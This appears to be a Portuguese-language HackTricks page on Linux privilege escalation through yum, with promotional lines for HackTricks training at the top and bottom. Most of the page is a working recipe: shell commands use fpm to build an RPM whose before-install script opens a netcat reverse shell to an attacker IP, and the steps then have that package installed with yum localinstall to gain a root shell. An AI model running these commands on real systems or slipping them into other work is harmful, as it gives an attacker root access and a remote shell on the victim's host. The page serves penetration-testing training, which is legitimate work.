hacktricks/linux-unix/privilege-escalation/exploiting-yum.md

3.8 KiB

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

Mais exemplos sobre yum também podem ser encontrados em gtfobins.

Executando comandos arbitrários via Pacotes RPM

Verificando o Ambiente

Para aproveitar esse vetor, o usuário deve ser capaz de executar comandos yum como um usuário com privilégios mais elevados, ou seja, root.

Um exemplo funcional desse vetor

Um exemplo funcional desse exploit pode ser encontrado na sala daily bugle no tryhackme.

Empacotando um RPM

Na seção a seguir, vou cobrir o empacotamento de um shell reverso em um RPM usando fpm.

O exemplo abaixo cria um pacote que inclui um gatilho before-install com um script arbitrário que pode ser definido pelo atacante. Quando instalado, este pacote executará o comando arbitrário. Eu usei um exemplo simples de shell netcat reverso para demonstração, mas isso pode ser alterado conforme necessário.

EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR

Capturando um shell

Usando o exemplo acima e assumindo que o yum pode ser executado como um usuário de maior privilégio.

  1. Transferir o rpm para o host
  2. Iniciar um ouvinte em seu host local, como o exemplo de ouvinte netcat
  3. Instalar o pacote vulnerável yum localinstall -y exploited-1.0-1.noarch.rpm
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks: